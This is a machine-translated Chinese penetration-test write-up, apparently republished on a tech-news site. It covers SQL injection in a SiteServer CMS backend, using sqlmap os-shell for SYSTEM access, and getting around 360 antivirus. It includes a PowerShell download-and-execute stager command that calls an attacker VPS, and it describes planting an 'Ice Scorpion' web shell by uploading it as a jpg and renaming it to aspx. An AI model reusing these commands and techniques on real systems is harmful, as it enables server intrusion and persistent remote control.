Shulou(Shulou.com)05/31 Report--

Editor to share with you the next time mssql injection + whitelist upload bypass 360example analysis, I believe that most people do not know much, so share this article for your reference, I hope you can learn a lot after reading this article, let's go to know it!

Information collection:

The site is built using vue+aspx+iis8.5. The site login box has a version number and the word siteserver exists in the url column, so it is suspected to be built by cms, but the cms has not been seen. Using Google search, it is found that the site is built with siteserver cms, the version is the latest, and the vulnerabilities provided on the Internet cannot be used here. After trying to inject + weak password + CAPTCHA bypass + unauthorized and other means in the login box, due to the account that has been tested Simply log in to the site for testing.

The picture shows the login picture I looked up from the Internet, with the version number instead of the cms prompt in the red box.

Functional testing:

After entering the background, I simply browsed the functions, mostly some page management functions. I will not repeat them here. This article is mainly from the injection point.

First: the test of the upload point: there are many places to upload, including avatars, ordinary doc files, editor upload, after testing, the upload function is limited by whitelist, so I decided to give up the upload point. After all, even if the jpg can be uploaded, it cannot be parsed because the iis version is too high. (but I later read an article that iis8.5 actually succeeded with a parsing vulnerability.)

Second: grab the bag at a "batch finishing" function.

The sql injection test is carried out on the keyword parameters of the search point, and an error is found, so the packet is directly copied and thrown to sqlmap to run. Python sqlmap.py-r 1.txt.

As a result, it is found that there is a stacked query and dba permission, and directly use the-- os-shell command to open xp_cmd to get shell. Use the whoami command to find that the current permission is directly the highest permission NT AUTHORITY\ SYSTEM, happy, in addition to these holes plus other points to clean up this infiltration is over.

Enter the private network:

But such a high authority are in hand, do not enter the intranet can not be justified, originally thought of very simple things.

Open vps, start cs, generate powershell horse, run os-shell, wait for it to go online, and an error is prompted:

Powershell-NoProfile-ExecutionPolicy Bypass-Command "IEX ((new-object net.webclient) .downloadstring ('http://xxx:port/a'))")

The first is to see if the machine can go out of the network. Ping checked that vps and dnslog are fine, so try to use the cmd command to execute powershell:

Cmd.exe / c powershell-NoProfile-ExecutionPolicy Bypass-Command "IEX ((new-object net.webclient) .downloadstring ('http://xxx:port/a'))")

Found that or reported the same error, suspected to be the problem of quotation marks, so Baidu cmd quotation marks escape using ^, the result is still not good.

Then the boss next to him said whether window server 2012 R2 set the powershell remote download execution policy, so he tried to use Get-ExecutionPolicy to view it and use Set-ExecutionPolicy to open it. The following is a local demonstration (the screenshot of the real environment is forgotten):

Please refer to this article: https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/

In the end, the powershell execution policy was successfully modified in the real environment, and then it was not possible to execute the command. At this time, I suddenly thought that there might be software killing, so tasklist took a look at it and found that there was 360 protection (there is no screenshot here).

Guess is really working, at this time the first idea is to bypass anti-soft, did not have too much contact with anti-soft tools, http://jackson-t.ca/runtime-exec-payloads.html, directly coded in this powershell command, the result can not be used, otherwise go to borrow a horse, but also trouble others.

At this time suddenly thought of sqlmap to write Malay to upload files, but mssql does not have the same function as mysql (later asked the boss sqlmap can also upload files in the case of os-shell (coquettish operation), suddenly remembered that I just tested when many function points have file upload function, although it is a whitelist, but it does not affect me to throw a picture immediately. Just do it, upload the ice scorpion picture horse directly in the avatar upload, bingxie.jpg. Then use the copy command in os-shell to rename copy d:\ abc\ img\ bingxie.jpg d:\ abc\ img\ bingxie.aspx. Then use the ice scorpion connection, there is no doubt that the direct success of the online, the end of the flower.

The above is all the contents of the article "an mssql injection + whitelist upload bypassing 360". Thank you for reading! I believe we all have a certain understanding, hope to share the content to help you, if you want to learn more knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.